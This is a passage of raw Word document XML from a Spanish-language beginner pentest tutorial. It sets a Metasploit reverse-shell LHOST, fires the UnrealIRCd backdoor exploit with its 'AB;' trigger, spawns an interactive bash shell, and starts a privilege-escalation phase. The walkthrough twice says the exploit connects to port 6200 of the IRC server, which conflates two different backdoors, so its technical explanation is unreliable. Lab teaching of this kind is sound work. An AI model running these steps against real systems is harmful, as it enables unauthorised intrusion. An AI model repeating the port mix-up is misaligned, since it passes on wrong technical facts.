        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DC20F8" w14:textId="77777777" w:rsidR="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t>Si tu IP de Kali es 192.168.1.100, entonces ejecutas en Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E98E47" w14:textId="451E8C4E" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
        <w:rPr>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C041EDF" w14:textId="77777777" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A69CAB" w14:textId="77777777" w:rsidR="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LHOST:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Local Host - La IP de tu máquina atacante (Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D52C2F" w14:textId="77777777" w:rsidR="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t>Es donde la shell reversa se conectará de vuelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01944DF4" w14:textId="77777777" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Por qué necesitamos esto?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8E077" w14:textId="4773E03F" w:rsidR="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t>El payload "reverse" hace que la máquina víctima se conecte de VUELTA a ti. Por eso necesita saber tu IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B5BCC0" w14:textId="77777777" w:rsidR="00B10AF9" w:rsidRDefault="00B10AF9" w:rsidP="00B10AF9">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Verifica q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>e veas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1813DB" w14:textId="0C062E74" w:rsidR="009C4911" w:rsidRPr="009C4911" w:rsidRDefault="009C4911" w:rsidP="009C4911">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4911">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FE7B1" w14:textId="2F68B553" w:rsidR="001D2361" w:rsidRDefault="00B10AF9" w:rsidP="00B10AF9">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F010BD0" wp14:editId="709F1585">
            <wp:extent cx="4827105" cy="896133"/>
            <wp:effectExtent l="76200" t="76200" r="126365" b="132715"/>
            <wp:docPr id="811228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302" cy="899326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4B486" w14:textId="60BDCEAC" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso </w:t>
      </w:r>
      <w:r w:rsidR="001D2361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: ¡EXPLOTAR!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E2EB0" w14:textId="54357909" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="004E0F3F" w:rsidP="00F84CB4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00ED2427" w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>xploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED2427" w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080216E5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Ejecuta todo el proceso de explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5334F388" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:lastRenderedPageBreak/>
        <w:t>Se conecta al puerto 6200 del objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F85EB" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Envía el comando especial del backdoor (AB;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E715639" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Ejecuta nuestro payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0597FA" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Nos da acceso a la máquina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA458C4" w14:textId="5280C6FE" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="004E0F3F">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Esto toma:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> 2-5 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEE3649" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="004E0F3F" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC42048" w14:textId="45F7CB57" w:rsidR="004E0F3F" w:rsidRDefault="004E0F3F" w:rsidP="004E0F3F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E40AD75" wp14:editId="4C845A4A">
            <wp:extent cx="5164389" cy="2228069"/>
            <wp:effectExtent l="76200" t="76200" r="132080" b="134620"/>
            <wp:docPr id="1845456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56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145" cy="2233572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89E60C" w14:textId="6F3C575F" w:rsidR="00ED2427" w:rsidRPr="00E27B16" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27B16">
        <w:rPr>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27B16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>¡FELICIDADES!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B0F85" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Si ves Command shell session 1 opened, ¡ya tienes acceso a la máquina!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F4982" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Tu prompt debería desaparecer o cambiar. Ahora estás "dentro" de la máquina víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D120E" w14:textId="0E548D2D" w:rsidR="004E0F3F" w:rsidRPr="004E0F3F" w:rsidRDefault="004E0F3F" w:rsidP="004E0F3F">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3412">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve">Activa un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E3412">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>prompto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E3412">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>, u</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>sa /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> directamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EA7882" w14:textId="77777777" w:rsidR="004E0F3F" w:rsidRPr="004E0F3F" w:rsidRDefault="004E0F3F" w:rsidP="004E0F3F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B1DC967" w14:textId="77777777" w:rsidR="004E0F3F" w:rsidRPr="004E0F3F" w:rsidRDefault="004E0F3F" w:rsidP="004E0F3F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0F3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3B68C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="008E3412" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3412">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué acaba de pasar técnicamente?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F0D26" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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t>Metasploit se conectó</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> al puerto 6200 del servidor IRC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6378410C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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t>Envió el comando especial</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> AB; seguido de nuestro payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176445D3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>backdoor en UnrealIRCd reconoció</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> AB; como comando secreto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD768AB" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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t>Ejecutó nuestro payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> como si fuera un comando del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED77116" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abrió una shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> (línea de comandos) que controlamos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D400F7E" w14:textId="77777777" w:rsidR="004B7F2E" w:rsidRDefault="004B7F2E" w:rsidP="004B7F2E"/>
    <w:p w14:paraId="51B76D15" w14:textId="77777777" w:rsidR="004B7F2E" w:rsidRPr="00A86A33" w:rsidRDefault="004B7F2E" w:rsidP="004B7F2E"/>
    <w:p w14:paraId="5A1A5AB1" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="004B7F2E" w:rsidRDefault="00433E8C" w:rsidP="004B7F2E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7F2E">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="0FC66374">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40162253" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="006B2386" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B2386">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FASE 5: ESCALADA DE PRIVILEGIOS (PRIVILEGE ESCALATION)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FA4D1" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A70AA9" w:rsidRDefault="00ED2427" w:rsidP="005F025F">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70AA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es esta fase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2B786" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="005F025F">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Normalmente, cuando explotas un servicio, obtienes acceso limitado (usuario sin privilegios). La escalada de privilegios es el proceso de obtener permisos de administrador (root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7621A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A70AA9" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9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70AA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Paso 1: Verificar tu identidad actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB51CB" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Dentro de la shell que obtuviste, ejecuta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DDA41F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="003D40AB" w:rsidRDefault="00ED2427" w:rsidP="003D40AB">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE2F20" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00E066E8" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692ADD4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>whoami: "Who am I?" - ¿Quién soy yo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14235145" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Comando Unix que muestra el nombre del usuario actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F180D6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
